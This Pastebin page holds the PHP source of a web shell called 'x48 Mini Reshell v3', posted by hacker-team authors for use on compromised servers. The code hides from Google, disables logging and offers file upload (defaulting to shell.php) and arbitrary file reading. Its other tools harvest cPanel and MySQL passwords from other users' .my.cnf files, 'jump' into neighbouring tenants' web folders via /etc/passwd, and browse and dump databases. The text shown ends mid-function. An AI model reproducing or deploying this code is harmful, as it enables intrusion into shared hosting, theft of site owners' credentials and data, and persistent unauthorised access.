Advertisement
ustadcage_48

x48 Mini Reshell v3

Jun 8th, 2016
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 57.84 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. // Default pas [x48]
  5. $auth_pass="fb853cd86dc5cccd63690f6b93ccd15e";
  6. $color = "#FFFF00";
  7. $default_action = 'FilesMan';
  8. @define('SELF_PATH', __FILE__);
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. @session_start();
  14. @error_reporting(0);
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('html_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @ini_set('output_buffering',0);
  20. @ini_set('display_errors', 0);
  21. @ini_set('file_uploads',1);
  22. @set_time_limit(0);
  23. @set_magic_quotes_runtime(0);
  24. @clearstatcache();
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27. function stripslashes_array($array) {
  28. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29. }
  30. $_POST = stripslashes_array($_POST);
  31. }
  32. function printLogin() {
  33. ?>
  34.  
  35.  
  36. <!DOCTYPE html>
  37. <html>
  38. <head>
  39. <title>[ Defacer Login ]</title>
  40. <meta name="robots" content="noindex, nofollow, noarchive">
  41. <link rel="icon" href="https://diasrosyad.files.wordpress.com/2012/09/jkt48.png" />
  42. <link href="http://fonts.googleapis.com/css?family=Atomic+Age" rel="stylesheet" type="text/css"> <style type="text/css">
  43.  
  44. body{ background:#000000; font-size:11px; font-family:Atomic Age; color:#fff; }
  45.  
  46. #main{ background:darkred; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; border:1px solid #fff;font-family:Atomic Age; }
  47.  
  48. .gaya { color:#fff; font-weight:bold; }
  49.  
  50. .inputz { background:black; border:0; padding:2px; border:1px solid white; font-size:11px; color:white; font-family:Atomic Age; }
  51.  
  52. .inputzbut{ font-size:11px; background:darkred; color:#fff; margin:0 4px; border:1px solid white; font-family:Atomic Age; }
  53.  
  54. .footer{ text-align:right; padding:0 16px; font-size:10px; letter-spacing:2px; color:white; }
  55. </style>
  56. </head>
  57. <body>
  58. <table id="main">
  59. <tr>
  60. <td>   
  61. <div style="width:100%;text-align:center;">    
  62. <form action="" method="post">  
  63. <img src="https://diasrosyad.files.wordpress.com/2012/09/jkt48.png" style="margin:2px;vertical-align:middle;" width="12px" height="12px" />     x48&nbsp;
  64. <span class="gaya">v3.0</span>
  65. <input class="inputz" type="password" name="pass" style="width:120px;" value="" />  <input class="inputzbut" type="submit" value=" >> " name="submitlogin" style="width:80px;" />  
  66. </form>    
  67. </div>
  68. </td>
  69. </tr>
  70. </table>
  71. <p class="footer">BebyYers Indonesia &copy; 2016 x48 [ UstadCage_48 ]
  72. </p>
  73. </body>
  74. </html>
  75.  
  76.     <?php
  77.    exit;
  78. }
  79. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  80.     if( empty( $auth_pass ) ||
  81.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  82.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  83.     else
  84.         printLogin();
  85.       if(isset($_GET['log']) && ($_GET['log'] == 'out'))
  86. {  
  87. ?>
  88. <?php
  89.  unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  90.    
  91. }  
  92.  
  93.   /* Copyright :             */
  94.   /* Recoded By UstadCage_48 */
  95.   /* Sumedang Cyber Team     */
  96.   /* res7ock - indoxploit    */
  97.   /* Sinkaroid X Kerupuk     */
  98.   /* Cpanel Author rEd X     */
  99.  
  100. $gambar = "https://data.desustorage.org/c/image/1454/02/1454025924675.png"; //url gambar
  101. $nick = "x48"; //nick kamu
  102. $v = "v3"
  103.  
  104. ?>
  105.      <html>
  106.      <head>
  107.      <link href='http://fonts.googleapis.com/css?family=Federant' rel='stylesheet' type='text/css'/>
  108.  
  109.  <style type="text/css">
  110.  body {
  111.        background:black; font-size:11px;
  112.        font-family: Federant;
  113.     color: white;  }
  114.  a {
  115.      color: dodgerblue;
  116.      font-family: Federant;
  117.       }
  118.  a:hover {
  119.      border-bottom:1px solid aqua;
  120.       }
  121.  #menu a {
  122.      font-family: Federant;
  123.         padding:4px 15px;
  124.         margin:0;
  125.         background:darkred;
  126.         color:white;
  127.         text-decoration:none;
  128.         letter-spacing:2px;
  129.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  130.        }
  131.        #menu a:hover {
  132.         padding:4px 15px;
  133.         margin:0;
  134.          font-family: Federant;
  135.         background: grey;
  136.         color:white;
  137.         text-decoration:none;
  138.         letter-spacing:2px;
  139.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  140.        }
  141.   textarea {
  142.        width:600px;
  143.        height:200px;
  144.        background: black;
  145.        border:1px solid darkred;
  146.        color: white;
  147.        font-family: Federant;
  148.        }
  149.   input[type=text] , input[type=file] , select {  
  150.        background:black;
  151.        color:white;border: 1px solid darkred;
  152.        padding:6px 6px 6px 6px;
  153.        font-family: Federant;
  154.         }
  155.   input[type=submit] {
  156.        background:#b70505;
  157.        color:white;border: 1px solid #000;
  158.        padding:6px 6px 6px 6px;
  159.        font-family: Federant;
  160.        }
  161.   .subbtn:hover {
  162.        background:#c0bfbf;
  163.        color:#000000;
  164.        font-family: Federant;
  165.        }
  166.  
  167. td, th { font-size: 12pt; text-align: left; vertical-align: top; color: dodgerblue; }
  168. h1           { font-size: 16pt; text-align: center; }
  169. h1 a         { color: #000000 !important; text-decoration: none; }
  170. p            { text-align: center; font-size: 9pt; }
  171. p a          { color: #666666 !important; }
  172. table        {  margin: 0 auto; border-collapse: collapse; border: 1px solid #ffffff; min-width: 400px; }
  173. th, td       { padding: 5px 10px; }
  174. th           { background: black; color: #ffffff; }
  175. td a         { color: dodgerblue !important; text-decoration: none; }
  176. th img       { position: relative; top: -3px; left: 2px; }
  177. td           { border-bottom: 1px solid #cccccc; background: black; }
  178. tr.odd td    { background: black; }
  179.  
  180. #lol a {
  181.         padding:4px 15px;
  182.         margin:0;
  183.         background:darkgreen;
  184.         color:white;
  185.         text-decoration:none;
  186.         letter-spacing:2px;
  187.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  188.        }
  189. </style>
  190.  
  191. <title>
  192. [ <?php echo $nick; ?> Mini Reshell <?php echo $v; ?> ]</title>
  193. </head>
  194.  
  195. <br><center><div id=menu>
  196. <a href=?beby=home>Home</a>
  197. <a href=?beby=config>Grabber</a>
  198. <a href=?beby=cpanel>Cpanel Finder</a>
  199. <a href=?beby=mysql>Mysql</a>
  200. <a href=?beby=uploads>Uploader</a>
  201. <a href=?beby=domain>Domain</a>
  202. <a href=?beby=tools>Tools</a>
  203.  
  204. </div></center>
  205. <p>
  206. <center>
  207. <img src=<?php echo $gambar; ?> width=320 height=315/><br /></center><br><center><div id=menu>
  208. <a href=?beby=jumper>Jumping</a>
  209. <a href=?beby=reverse>Riverse IP</a>
  210. <a href=?beby=symlink>Symlink</a>
  211. <a href=?beby=info>Info Web</a>
  212. <a href=?beby=quotes>Itachi Quotes</a>
  213. <a href=?log=out>Logout</a>
  214.  
  215. </div></center>
  216. <br><center>
  217.    
  218. <?php
  219. //uname
  220.  echo '<font color="white">';
  221.  echo php_uname();
  222.  echo '<br><font color="darkred">Path :</font>';
  223.  echo getcwd();
  224.  echo '</font>';
  225. //info web
  226. if(isset($_GET['beby']) && ($_GET['beby'] == 'info')){
  227. ?>
  228.  
  229. <br><br><font size="2pt" color="green">Get Info Website</font>
  230. <form action="?beby" method="GET">
  231. <input type="text" name="beby" value="beby@Codes#~: info"> <input type="submit" value="Cek >> ">
  232. </form>
  233.  
  234.  
  235.  
  236. <?php
  237.     }
  238. //info codes
  239.     if(isset($_GET['beby']) && ($_GET['beby'] == 'beby@Codes#~: info')){
  240. ?>
  241.  
  242.     <form action="?path=<?php echo $path; ?>&amp;beby=" method="post">
  243.  
  244. <?php
  245.  $verdad = php_uname('s') . php_uname('r');
  246.     $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $verdad . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  247.  
  248. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Name </th><th style="background:darkred;color:white; border-left:1px solid white; text-align:center; "> Info </th></tr> ';
  249. ?>
  250.  
  251.   <tr><td>IP</td>
  252.   <td style='border-left:1px solid white;' > <?php echo $_SERVER['SERVER_ADDR']; ?></td></tr>
  253.  
  254.   <tr><td>User</td>
  255.   <td style='border-left:1px solid white;' > uid=<?php echo getmyuid(); ?> gid= <?php echo getmygid(); ?></td></tr>
  256.  
  257.   <tr><td>Path</td>
  258.   <td style='border-left:1px solid white;' > <?php echo getcwd(); ?></td></tr>
  259.  
  260.   <tr><td>PHP Version</td>
  261.   <td style='border-left:1px solid white;' > <?php echo phpversion(); ?> </td></tr>
  262.  
  263.   <tr><td>Server</td>
  264.   <td style='border-left:1px solid white;' ><? echo $_SERVER['SERVER_SOFTWARE']; ?> </td></tr>
  265.  
  266.   <tr><td> System </td>
  267.   <td style='border-left:1px solid white;' > [ <a href=<? echo $link; ?>'><? echo $verdad; ?></a> ] <?php echo php_uname('v'); ?></td></tr>
  268.  
  269. <?php
  270.  
  271.   echo '<tr><td>';
  272.  echo 'Safe Mode </td><td style="border-left:1px solid white;"> ';
  273.     if (ini_get('safe_mode') == 0) {
  274.         echo "<font color='red'>OFF</font>";
  275.     } else {
  276.         echo " <font color='green'>ON</font> ";
  277.     }
  278.    
  279.     echo '</td></tr>';
  280.     echo '<tr><td style="border-left:1px solid white;">';
  281.    
  282.  echo 'Magic Quotes </td><td style="border-left:1px solid white;"> ';
  283.     if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  284.         echo "<font color='red'>OFF</font>";
  285.     } else {
  286.         echo " <font color='green'>ON</font> ";
  287.     }
  288.     echo '</td></tr></table>';
  289.    
  290. ?>    
  291.    
  292.     <?php
  293.     }
  294. //kosong kak
  295. elseif(isset($_GET['beby']) && ($_GET['beby'] == '')){
  296.     ?>
  297.  
  298. <?php
  299.     }
  300. //home
  301. if(isset($_GET['beby']) && ($_GET['beby'] == 'home')){
  302.     ?>
  303.    
  304.      <?php
  305.    
  306.      echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Nama </th><th style="border-left:1px solid white;text-align:center;background:darkred;color:white;"> Disable </th></tr> ';
  307.         echo '<tr><td>DisablePHP</td><td style="border-left:1px solid white;">';
  308.         $disable_functions = @ini_get("disable_functions");
  309.         echo "<font color='darkred'>";
  310.         echo $disable_functions;
  311.         echo "</font>";
  312.       echo '</td></tr></table>';
  313.     ?>
  314.    
  315. <?php
  316.     }
  317. //uploads
  318.      elseif(isset($_GET['beby']) && ($_GET['beby'] == 'uploads'))
  319.     { ?>
  320.     <br>
  321.          <form action="" method="post" enctype="multipart/form-data">
  322.           File :    <input type="file" name="file" />
  323.             <br />
  324.           New Name :    <input type="text" name="ufile" value="shell.php" />    
  325.           <br />    
  326.           <input name="upload" type="submit" value="Upload" />
  327.           </form>
  328.          
  329.           <?php if (isset($_REQUEST['ufile'])) { $ufile = $_POST ['ufile' ] ; } if (isset($_REQUEST['upload'])) { if ($_POST ['upload' ]){ if (@copy ($_FILES ['file' ]['tmp_name' ], $ufile )) {
  330.           echo "<b><font color='green'><a href='$ufile'>$ufile</a> = File Successfully Uploaded !!!</font></b>" ;
  331.           } else {
  332.           echo "<b><font color='red'><a href='$ufile'>$ufile</a> = File Upload Error !!!</font></b>" ;
  333.           } } }
  334.     ?>
  335.    
  336. <?php
  337.       }
  338. //cpanel auto crack
  339. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'cpanel')){
  340. @ini_set('display_errors',0);
  341. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  342.     $ar0=explode($marqueurDebutLien, $text);
  343.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  344.     return trim($ar1[0]);
  345. }
  346.  
  347. echo '<br><br>';
  348.  
  349. echo "<center>";
  350. $d0mains = @file('/etc/named.conf');
  351. $domains = scandir("/var/named");
  352.  
  353. if ($domains or $d0mains)
  354. {
  355.     $domains = scandir("/var/named");
  356.     if($domains) {
  357. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  358. $count=1;
  359. $dc = 0;
  360. $list = scandir("/var/named");
  361. foreach($list as $domain){
  362. if(strpos($domain,".db")){
  363. $domain = str_replace('.db','',$domain);
  364. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  365. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  366. $path = getcwd();
  367.  
  368. if (is_readable($dirz)) {
  369. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  370. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  371. $password=entre2v2($p,'password="','"');
  372. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'>Check Here</a></td></tr>";
  373. $dc++;
  374. }
  375. }
  376. }
  377. echo '</table>';
  378. $total = $dc;
  379. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  380. echo '</center>';
  381. }else{
  382. $d0mains = @file('/etc/named.conf');
  383.     if($d0mains) {
  384. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  385. $count=1;
  386. $dc = 0;
  387. $mck = array();
  388. foreach($d0mains as $d0main){
  389.     if(@eregi('zone',$d0main)){
  390.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  391.         flush();
  392.         if(strlen(trim($domain[1][0])) >2){
  393.             $mck[] = $domain[1][0];
  394.         }
  395.     }
  396. }
  397. $mck = array_unique($mck);
  398. $usr = array();
  399. $dmn = array();
  400. foreach($mck as $o) {
  401.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  402.     $usr[] = $infos['name'];
  403.     $dmn[] = $o;
  404. }
  405. array_multisort($usr,$dmn);
  406. $dt = file('/etc/passwd');
  407. $passwd = array();
  408. foreach($dt as $d) {
  409.     $r = explode(':',$d);
  410.     if(strpos($r[5],'home')) {
  411.         $passwd[$r[0]] = $r[5];
  412.     }
  413. }
  414. $l=0;
  415. $j=1;
  416. foreach($usr as $r) {
  417. $dirz = '/home/'.$r.'/.my.cnf';
  418. $path = getcwd();
  419. if (is_readable($dirz)) {
  420. copy($dirz, ''.$path.'/'.$r.'.txt');
  421. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  422. $password=entre2v2($p,'password="','"');
  423. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  424. $dc++;
  425.                 flush();
  426.                 $l=$l?0:1;
  427.                 $j++;
  428.                                 }
  429.             }
  430.                         }
  431. echo '</table>';
  432. $total = $dc;
  433. echo '<br><font color="green">Total cPanel Found = '.$total.'</font>';
  434. echo '</center>';
  435.  
  436. }
  437. }else{
  438. echo "<i><font color='green'>ERROR<br>/var/named or etc/named.conf Not Accessible! </font> </i>";
  439. }
  440. ?>
  441.  
  442. <?php
  443.     }
  444.     elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper')){
  445.     ?>
  446.    
  447.     <div id="menu"><br><br><a href="?beby=jumper1">Jumping V1</a> <a href="?beby=jumper2">Jumping2</a>
  448.     </div>
  449.    
  450.     <?php
  451.     }
  452. //jumping1
  453.     elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper1')){
  454.         echo '<center>';
  455.      ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b><font color="green">Error: safe_mode = on</font></b>  </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  456.         <br><center>$nick Mini Reshell</center> ');
  457.     set_time_limit(0);
  458.     @$passwd = fopen('/etc/passwd','r');
  459.     if (!$passwd) { die('<br><b><font color="green">Error : coudn`t read /etc/passwd</font></b>     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By '.$nick.'</font></center><b>
  460.         <br><center>'.$nick.' Mini Reshell</center> '); }
  461.     $pub = array();
  462.     $users = array();
  463.     $conf = array();
  464.     $i = 0;
  465.     while(!feof($passwd))
  466.     {
  467.         $str = fgets($passwd);
  468.         if ($i > 35)
  469.             {
  470.             $pos = strpos($str,':');
  471.             $username = substr($str,0,$pos);
  472.             $dirz = '/home/'.$username.'/public_html/';
  473.             if (($username != ''))
  474.                 {
  475.                 if (is_readable($dirz))
  476.                     {
  477.                     array_push($users,$username);
  478.                     array_push($pub,$dirz);
  479.                     }
  480.                 }
  481.             }
  482.         $i++;
  483.     }
  484.    
  485.     echo '<br>';
  486.     echo "[+] Founded <font color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  487.     echo "[+] Founded <font color=red> ".sizeof($pub)." </font> readable public_html directories\n"."<br />";
  488.     echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  489.     foreach ($users as $user)
  490.         {
  491.         $path = "/home/$user/public_html/";
  492.         echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
  493.         echo "<font color=white>[FOUND] <a href='?beby=exploler&path=$path'>$path</a></font><br>";
  494.         echo " </td></tr></table> ";
  495.         }
  496.     echo "\n";
  497.     echo '</center>';
  498. ?>
  499.  
  500. <?php
  501.     }
  502. //jumping2
  503.     elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper2')){
  504.  
  505.             $i = 0;
  506.     echo "<pre><div class='margin: 5px auto;'>";
  507.     $etc = fopen("/etc/passwd", "r");
  508.     while($passwd = fgets($etc)) {
  509.         if($passwd == '' || !$etc) {
  510.             echo "<font color=red>Can't read /etc/passwd</font>";
  511.         } else {
  512.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  513.             foreach($user_jumping[1] as $user_idx_jump) {
  514.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
  515.                 if(is_readable($user_jumping_dir)) {
  516.                     $i++;
  517.                     $jrw = "[<font color=lime>R</font>] <a href='?beby=exploler&path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  518.                     if(is_writable($user_jumping_dir)) {
  519.                         $jrw = "[<font color=lime>RW</font>] <a href='?beby=exploler&path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  520.                     }
  521.                     echo $jrw;
  522.                     $domain_jump = file_get_contents("/etc/named.conf");   
  523.                     if($domain_jump == '') {
  524.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  525.                     } else {
  526.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  527.                         foreach($domains_jump[1] as $dj) {
  528.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  529.                             $user_jumping_url = $user_jumping_url['name'];
  530.                             if($user_jumping_url == $user_idx_jump) {
  531.                                 echo " => ( <u>$dj</u> )<br>";
  532.                                 break;
  533.                             }
  534.                         }
  535.                     }
  536.                 }
  537.             }
  538.         }
  539.     }
  540.     if($i == 0) {
  541.     } else {
  542.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  543.     }
  544.     echo "</div></pre>";
  545.  
  546. }
  547. //get files jump
  548.  elseif(isset($_GET['filesrc'])){
  549. echo "<br><br>Current File : ";
  550. echo $_GET['filesrc'];
  551. echo '<br /><br><table width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%"><tr><td style="background:darkred;color:white;"><b>Code &lt;/&gt;</b></td></tr><tr><td width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%" >';
  552.  
  553. ?>
  554.  
  555. <?php
  556. echo ' <font color="green"> ';
  557. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  558. echo ' </font> ';
  559. ?>
  560.  
  561. <?php
  562. echo '</td></tr></table>';
  563. }
  564. //open directory
  565.   elseif(isset($_GET['beby']) && ($_GET['beby'] == 'exploler')){
  566.          if(isset($_GET['path'])){
  567. $path = $_GET['path'];
  568. }else{
  569. $path = getcwd();
  570. }
  571. $path = str_replace('\\','/',$path);
  572. $paths = explode('/',$path);
  573. echo ' <br><br> <div id="lol"> <font color="darkred"> Current Path : </font><font color="green"> ';
  574. foreach($paths as $id=>$pat){
  575. if($pat == '' && $id == 0){
  576. $a = true;
  577. echo '<a href="?beby=exploler&path=/">Root</a>&nbsp;';
  578. continue;
  579. }
  580. if($pat == '') continue;
  581. echo '<a href="?beby=exploler&path=';
  582. for($i=0;$i<=$id;$i++){
  583. echo "$paths[$i]";
  584. if($i != $id) echo "/";
  585. }
  586. echo '">'.$pat.'</a>&nbsp;';
  587. }
  588. echo ' </font></div> ';
  589.  
  590. $path = getcwd();
  591. if(isset($_GET['path'])){
  592. $path = $_GET['path'];
  593. }else{
  594. $path = getcwd();
  595. }
  596. //scan directory
  597.   $scandir = scandir($path);
  598. echo '<br><br><center><table class="bawah"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  599. <tr>
  600. <td style="background:darkred;color:white;"><center>Name</center></td>
  601. <td style="background:darkred;color:white; border-left:1px solid white;"><center>Permissions</center></td>
  602. </tr>';
  603. //for scan directory
  604. foreach($scandir as $dir){
  605. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  606. echo "<tr>
  607. <td> [DIR] <font color=\"dodgerblue\"> <a href=\"?beby=exploler&path=$path/$dir\">$dir</a></font></td>
  608. <td style='border-left:1px solid white;'><center>";
  609. if(is_writable("$path/$dir")) echo '<font color="green">';
  610. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  611. echo perms("$path/$dir");
  612. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  613. echo "</center></td>
  614. </tr>";
  615. }
  616. echo '<br>';
  617. //for scan filelist
  618. foreach($scandir as $file){
  619. if(!is_file("$path/$file")) continue;
  620. $size = filesize("$path/$file")/1024;
  621. $size = round($size,3);
  622. if($size >= 1024){
  623. $size = round($size/1024,2).' MB';
  624. }else{
  625. $size = $size.' KB';
  626. }
  627. //mempersingkat nama file
  628. if (strlen($file) > 40) {
  629.                         $url = substr($file, 0, 35) . "...";
  630.                     } else {
  631.                         $url = $file;
  632.                     }
  633. //starting
  634. echo "<tr>
  635. <td> [XXX] <font color='dodgerblue'><a href=\"?beby=exploler&filesrc=$path/$file&path=$path\">$url</a></font></td><center><td style='border-left:1px solid white;'><center>";
  636. if(is_writable("$path/$file")) echo '<font color="green">';
  637. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  638. echo perms("$path/$file");
  639. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  640. echo "</center></td></tr>";
  641. }
  642. echo '</table>
  643. </center>';
  644. ?>
  645.  
  646. <?php
  647.     }
  648. //mysql tools
  649.    elseif(isset($_GET['beby']) && ($_GET['beby'] == 'mysql')){
  650. ?>
  651. <?php
  652.  
  653. echo "<br><br>
  654. <center>
  655. <table style='border:0px'>
  656. <form action='' method=GET>
  657. <td style='border:0px' ><b>Server : </b></td><td style='border:0px' ><input class=inputz type=text name=host value=localhost></td><tr>
  658. <td style='border:0px' ><b>User : </b></td><td style='border:0px' ><input class=inputz type=text name=usuario value=root></td><tr>
  659. <td style='border:0px' ><b>Pass : </b></td><td style='border:0px' ><input class=inputz type=text name=password value=></td><tr>
  660. </table>
  661. <br><input class=inputzbut type=submit name=entersql value=Connect>
  662. </form></center>
  663. ";
  664.     }
  665.    
  666.     if(isset($_GET['add'])){
  667.        
  668.         $host = $_GET['host'];
  669.         $user = $_GET['usuario'];
  670.         $pass = $_GET['password'];
  671.         $name = $_GET['nam'];
  672.        
  673.          $mysql = @mysql_connect($host, $user, $pass);
  674.               $sql = 'CREATE DATABASE '.$name;
  675. if (mysql_query($sql, $mysql)) {
  676.     echo "<br><br>Database <font color=dodgerblue>$name</font> created successfully\n";
  677. } else {
  678.     echo '<br><br>Error creating database: ' . mysql_error() . "\n";
  679. }
  680. }    
  681.  
  682. if(isset($_GET['createdb'])){
  683.            
  684.         $host = $_GET['host'];
  685.         $user = $_GET['usuario'];
  686.         $pass = $_GET['password'];
  687.        
  688.     echo '<br><br><form action="?add" method="get">
  689.          <input type="hidden" name="host" value="'.$host.'">
  690.         <input type="hidden" name="usuario" value="'.$user.'">
  691.             <input type="hidden" name="password" value="'.$pass.'">
  692.     <input type="text" class="inputz" name="nam" value="New_db" /><input type="submit" name="add" value="Create" />
  693.     </form>';
  694.    
  695. }
  696.  
  697.     if (isset($_GET['entersql'])) {
  698.         if ($mysql = @mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password'])) {
  699.             $user = $_GET['usuario'];
  700.             $host = $_GET['host'];
  701.             $pass = $_GET['pass'];         
  702.             if ($databases = @mysql_list_dbs($mysql)) {
  703.                 echo "<center><br><br>Connected To root@$host -&gt; [ <a href='?host=$host&usuario=$user&password=$pass&entersql=Connect'>Database</a> ]<br>
  704.                [ <a href='?host=$host&usuario=$user&password=$pass&createdb'>New Database</a> ]<br><br>";
  705.                 echo "<table class=explore><tr><th style='background:darkred;color:white;'>Database Name</th><th style='background:darkred;color:white;'>Enter</th><th style='background:darkred;color:white;'>Down</th></tr>";
  706.                 while ($dat = @mysql_fetch_row($databases)) {
  707.                     foreach($dat as $indice => $valor) {
  708.                         echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=" . $_GET['host'] . "&usuario=" . $_GET['usuario'] . "&password=" . $_GET['password'] . "&enterdb=" . $valor . ">Enter</a></td><td class=main><a href=?datear=$valor&host=" . $_GET['host'] . "&usuario=" . $_GET['usuario'] . "&password=" . $_GET['password'] . "&bajardb=" . $valor . ">Download</a></td><tr>";
  709.                     }
  710.                 }
  711.                 echo "</table>";
  712.             } else {
  713.                 echo "<script>alert('Error loading databases');</script>";
  714.                
  715.             }
  716.         } else {
  717.             echo "<script>alert('Error');</script>";
  718.            
  719.         }
  720.     }
  721.    
  722.     if (isset($_GET['enterdb'])) {
  723.         $mysql = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']);
  724.         mysql_select_db($_GET['enterdb']);
  725.         echo "<center>";
  726.         $tablas = mysql_query("show tables from " . $_GET['enterdb']) or die("error");
  727.          
  728.          $user = $_GET['enterdb'];
  729.             $host = $_GET['host'];
  730.        
  731.         echo "<br><br>Connected To root@$host -&gt; [ <a href='?host=localhost&usuario=root&password=&entersql=Connect'>Database</a> ] -&gt; [ $user ]<br><br><table class='explore'> <tr><th style='background:darkred;color:white;'>Database Name</th><th style='background:darkred;color:white;'>Enter</th><th style='background:darkred;color:white;'>Down</th></tr> ";
  732.         while ($tabla = mysql_fetch_row($tablas)) {
  733.             foreach($tabla as $indice => $valor) {
  734.                 echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=" . $_GET['host'] . "&usuario=" . $_GET['usuario'] . "&password=" . $_GET['password'] . "&entertable=" . $valor . "&condb=" . $_GET['enterdb'] . ">Enter</a></td></td><td class=main><a href=?datear=$valor&host=" . $_GET['host'] . "&usuario=" . $_GET['usuario'] . "&password=" . $_GET['password'] . "&bajartabla=" . $valor . "&condb=" . $_GET['enterdb'] . ">Download</a><tr>";
  735.             }
  736.         }
  737.         echo "</table>";
  738.     }
  739.    
  740.     if (isset($_GET['entertable'])) {
  741.         $mysql = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']);
  742.          
  743.          $user = $_GET['condb'];
  744.             $host = $_GET['host'];
  745.             $adm = $_GET['usuario'];
  746.             $pass = $_GET['password'];
  747.                mysql_select_db($_GET['condb']);
  748.         echo "<br><br>Connected To root@$host -&gt; [ <a href='?host=localhost&usuario=root&password=&entersql=Connect'>Database</a> ] -&gt; [ <a href=?datear=$user&host=$host&usuario=$adm&password=$pass&enterdb=$user>$user</a> ]
  749. <br><br>
  750. <form action='' method=POST>
  751. <b>Your Query : </b><input class='inputz' type=text name=sentencia size=70 value='select * from " . $_GET['datear'] . "'>
  752. <input type=hidden name=host value=" . $_GET['host'] . ">
  753. <input type=hidden name=usuario value=" . $_GET['usuario'] . ">
  754. <input type=hidden name=password value=" . $_GET['password'] . ">
  755. <input type=hidden name=condb value=" . $_GET['database'] . ">
  756. <input type=hidden name=entertable value=" . $_GET['tabla'] . ">
  757. <input class='inputzbut' type=submit name=mostrar value=Send&nbsp;Query>
  758. </form>
  759. ";
